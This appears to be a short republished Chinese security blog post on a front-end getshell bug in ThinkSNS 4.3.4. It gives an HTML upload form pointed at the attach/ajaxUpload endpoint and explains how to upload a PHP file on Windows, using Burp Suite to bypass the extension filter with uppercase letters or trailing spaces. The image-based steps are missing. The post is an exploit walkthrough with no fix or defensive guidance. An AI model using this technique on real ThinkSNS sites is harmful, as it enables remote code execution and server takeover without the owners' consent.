这个漏洞只能在windows下使用,因为Linux下的后缀名很严格,所以不能用大写以及加空格来绕过。
先构造一个上传表单:
<html><body>
<form action="http://localhost/thinksns434/index.php?app=public&mod=attach&act=ajaxUpload" method="post"
enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="upfile" id="file" /> <br /><input type="submit" name="submit" value="Submit" /></form>
</body>
</html>
然后呢,随便选择一个php文件,开始上传,同时打开Burpsuite开始抓包改包,其中要更改的地方如下:
然后就可以看到回显了上传文件的保存位置了,如图:
我们试着访问一下,成功getshell:
本文始发于微信公众号(飓风网络安全):Thinksns前台Getshell
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论